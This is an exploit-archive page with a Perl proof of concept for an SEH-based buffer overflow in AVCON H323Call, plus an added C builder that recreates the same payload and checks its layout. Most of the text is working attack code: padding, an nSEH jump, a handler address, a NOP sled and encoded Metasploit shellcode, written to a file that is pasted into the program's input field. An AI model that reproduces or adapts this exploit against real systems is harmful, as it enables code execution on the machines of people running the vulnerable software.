AVCON H323Call Buffer Overflow
Source: http://twitter.com/D1N   Author: Beresford   Published: 2010-05-10

#!/usr/bin/perl
use strict;
use warnings;

# Exploit Title: AVCON H323Call Buffer Overflow
# Date: 5/9/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Versions: 4.6.8.7 | 4.6.4.0
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Download: http://meeting.bjhr.gov.cn/avcon/avcon.exe
# Download: http://meeting.cei.gov.cn/avcon/avcon.exe

my $exploit = "poc.txt";

## EDB Test Notes:
## The software can be installed in English. Once installed, go to "Start" -> "AVCON4" -> select H323 Call,
## or just run "H323Call.exe" located inside the installation folder,
## copy and paste the exploit (string) into the input field (there's only one),
## and click on "call". (This is a different flaw in the software package; it affects H323Call.)

my $junk = "\x41" x 1019;               # filler up to the nSEH field of the overwritten SEH record
my $nSEH = "\xeb\x08\x90\x90";          # JMP SHORT +8: skips the SEH pointer and lands in the NOP sled
my $SEH = pack('V',0x1005FE29);         # overwritten handler address, little-endian ('V')
my $nops = "\x90" x 25;                 # NOP sled leading into the shellcode
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
"\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
"\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
"\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
"\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
"\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
"\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
"\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
"\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
"\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
"\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
"\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
"\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
"\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
"\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
"\x97\x2d\x30\x18\xa5\xbe\x86\x7b";
my $padding = "E" x 5000;               # trailing filler so the overrun keeps going and an exception is raised
my $payload = $junk.$nSEH.$SEH.$nops.$buf.$padding;

open(my $fh, '>', $exploit) or die "Cannot write $exploit: $!";
binmode($fh);                           # raw bytes: no newline translation on Windows
print $fh $payload;
close($fh);
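Added example (not part of the original PoC, and not AVCON code): a C program that builds a buffer with the same layout as the Perl script above (junk, nSEH, SEH, NOP sled, shellcode, padding) and checks the properties an SEH overwrite relies on before writing it out: that the nSEH short jump lands inside the NOP sled, that the little-endian handler address contains no null or line-ending bytes, and that the field offsets are the ones the PoC's byte counts imply. The shellcode is a constructed single INT3 stand-in for the 218-byte Metasploit payload; the handler address 0x1005FE29 is taken from the PoC, and the page does not say which module provides it.

```c
/* Added example: SEH-overwrite payload builder with layout checks.
 * Same field order and sizes as the Perl PoC above; shellcode is a
 * constructed stand-in (INT3), not the calc payload from the page. */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define JUNK_LEN 1019             /* bytes before the nSEH field (from the PoC) */
#define NOP_LEN  25
#define PAD_LEN  5000
#define SEH_ADDR 0x1005FE29u      /* handler address from the PoC; module not named on the page */

static const uint8_t kNseh[4]     = { 0xEB, 0x08, 0x90, 0x90 }; /* JMP SHORT +8 ; NOP ; NOP */
static const uint8_t kShellcode[] = { 0xCC };                   /* constructed stand-in: INT3 */

typedef struct {
    uint8_t *buf;
    size_t len;
    size_t nseh_off, seh_off, nops_off, sc_off;   /* field offsets inside buf */
} payload_t;

/* Equivalent of Perl's pack('V', $addr): 32-bit little-endian. */
static void put_le32(uint8_t *dst, uint32_t v) {
    dst[0] = (uint8_t)(v);       dst[1] = (uint8_t)(v >> 8);
    dst[2] = (uint8_t)(v >> 16); dst[3] = (uint8_t)(v >> 24);
}

static payload_t build_payload(void) {
    payload_t p;
    p.len = JUNK_LEN + sizeof kNseh + 4 + NOP_LEN + sizeof kShellcode + PAD_LEN;
    p.buf = malloc(p.len);
    if (!p.buf) { perror("malloc"); exit(1); }
    uint8_t *q = p.buf;
    memset(q, 'A', JUNK_LEN);                                   q += JUNK_LEN;
    p.nseh_off = (size_t)(q - p.buf); memcpy(q, kNseh, sizeof kNseh); q += sizeof kNseh;
    p.seh_off  = (size_t)(q - p.buf); put_le32(q, SEH_ADDR);          q += 4;
    p.nops_off = (size_t)(q - p.buf); memset(q, 0x90, NOP_LEN);       q += NOP_LEN;
    p.sc_off   = (size_t)(q - p.buf); memcpy(q, kShellcode, sizeof kShellcode); q += sizeof kShellcode;
    memset(q, 'E', PAD_LEN);
    return p;
}

/* Where the short jump in nSEH lands: after the 2-byte "EB rel8" executes,
 * EIP = nseh_off + 2, and the signed rel8 is added to that. */
static long jmp_target(const payload_t *p) {
    int8_t rel = (int8_t)p->buf[p->nseh_off + 1];
    return (long)p->nseh_off + 2 + rel;
}

/* The landing point must be inside the NOP sled so execution slides into the shellcode. */
static int jmp_lands_in_sled(const payload_t *p) {
    long t = jmp_target(p);
    return t >= (long)p->nops_off && t < (long)p->sc_off;
}

/* 1 if the four handler-address bytes contain none of the usual bad characters. */
static int seh_has_no_badchars(const payload_t *p) {
    static const uint8_t bad[] = { 0x00, 0x0A, 0x0D };
    for (int i = 0; i < 4; i++)
        for (size_t j = 0; j < sizeof bad; j++)
            if (p->buf[p->seh_off + i] == bad[j]) return 0;
    return 1;
}

/* Write the raw bytes (binary mode, like binmode in Perl). Returns 1 on success. */
static int write_payload(const payload_t *p, const char *path) {
    FILE *f = fopen(path, "wb");
    if (!f) return 0;
    size_t n = fwrite(p->buf, 1, p->len, f);
    fclose(f);
    return n == p->len;
}

int main(void) {
    payload_t p = build_payload();
    printf("len=%zu nSEH@%zu SEH@%zu sled=[%zu,%zu) jmp->%ld\n",
           p.len, p.nseh_off, p.seh_off, p.nops_off, p.sc_off, jmp_target(&p));
    if (!jmp_lands_in_sled(&p) || !seh_has_no_badchars(&p)) {
        fprintf(stderr, "layout check failed\n");
        return 1;
    }
    if (!write_payload(&p, "poc.txt")) { perror("poc.txt"); return 1; }
    free(p.buf);
    return 0;
}
```

With the PoC's sizes the checks pass: nSEH sits at offset 1019, the handler address at 1023 (bytes 29 FE 05 10, no nulls), the sled at 1027..1051, and the JMP SHORT +8 lands at 1029, two bytes into the sled. Changing JUNK_LEN, the jump displacement or the address to a value with a null byte makes the corresponding check fail before anything is written.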